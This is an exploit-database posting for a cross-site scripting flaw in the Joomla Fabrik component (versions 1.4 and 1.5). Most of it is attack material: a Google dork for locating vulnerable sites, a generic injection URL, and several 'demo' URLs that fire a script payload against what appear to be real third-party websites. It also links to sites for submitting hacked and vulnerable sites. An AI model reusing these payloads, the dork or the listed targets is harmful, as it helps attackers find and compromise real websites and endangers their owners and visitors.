Joomla Fabrik 1.4 / 1.5 Cross Site Scripting
Posted on 25 February 2017
################################# # # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@ # ##################################### ##################################### # Iranian Exploit DataBase # Joomla Component com_fabrik Xss Injection Vulnerability # Google Dork: inurl:index.php?option=com_fabrik # Date : 20/2/2017 # version : 1.4 and 1.5 # Category: Webapps # Tested on: Windows # Author : Amir ( iedb.team@gmail.com - https://telegram.me/AmirAm67) # Site : IeDb.Ir - irist.ir - xssed.Ir # Iedb Telegram : https://telegram.me/iedbteam # Archive Exploit = http://iedb.ir/exploits-6915.html ##################################### Bug : http://localhost/[PATH]/index.php?option=com_fabrik[xss] Demo : http://bluejaylodgecostarica.com/index.php?option=com_fabrik'"><script>alert(/IrIsT.Ir/)</script> http://www.ngex.com/bd/search?q=supermarkets/index.php?option=com_fabrik'"><script>alert(/IrIsT.Ir/)</script>&place=Nigeria http://www.ville-rouvroy62.fr/index.php?option=com_fabrik'"><script>alert(/IrIsT.Ir/)</script>&view=form&fabrik=2&random=0&Itemid=2 http://bluejaylodgecostarica.com/index.php?option=com_fabrik'"><script>alert(/IrIsT.Ir/)</script>&c=import&view=import&fietype=csv&tableid=0 https://www.wannonwater.com.au/index.php?option=com_fabrik'"><script>alert(/IrIsT.Ir/)</script>&Itemid=305 ##################################### ** http://iedb.ir ==>> Iranian Exploit DataBase And Iranian Security Team ** http://irist.ir ==>> submit hacked sites ** http://xssed.Ir ==>> Sign vulnerable sites ( xss and sql ) (Vulnerability attack information site) Thanks to : C0dex,B3hz4d,Beni_vanda,Mr_time,Bl4ck M4n,black_security,Yasser,Ramin Assadian,Black_Nofuzi,SecureHost,1TED,Mr_Kelever,Mr_keeper,Mahmod,Iedb,Khashayar,B3hz4d4,Shabgard,Cl09er, Be_lucky,Moslem Haghighian,Dr_Iman,8Bit,Javid,Esmiley_Amir,Mahdi_feizezade,Amin_Zohrabi,Shellshock3 And all my friends And All Member In Iedb.Ir Team ##################################### # Archive Exploit = http://iedb.ir/exploits-6915.html #####################################